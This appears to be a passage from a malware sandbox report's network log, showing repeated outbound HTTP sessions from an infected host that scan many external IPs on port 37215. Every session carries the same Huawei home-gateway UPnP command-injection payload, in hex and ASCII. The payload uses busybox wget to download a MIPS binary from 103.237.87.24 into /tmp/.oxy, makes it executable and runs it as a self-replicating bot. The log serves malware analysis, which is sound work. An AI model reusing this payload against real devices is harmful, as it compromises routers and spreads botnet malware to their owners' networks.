                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  744192.168.2.1347196157.95.223.8837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.317986965 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  745192.168.2.136036441.73.177.8837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.318008900 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  746192.168.2.136030241.43.27.2637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.347551107 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  747192.168.2.1339522197.105.147.11337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.347553015 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  748192.168.2.135965641.18.98.3137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.347551107 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  749192.168.2.1340800197.40.69.18137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.347558022 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  750192.168.2.135919241.47.116.6637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.347592115 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  751192.168.2.1333182138.3.142.23237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.347595930 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  752192.168.2.1355458116.193.85.1437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.347616911 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  753192.168.2.1360640157.253.226.24637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.347626925 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 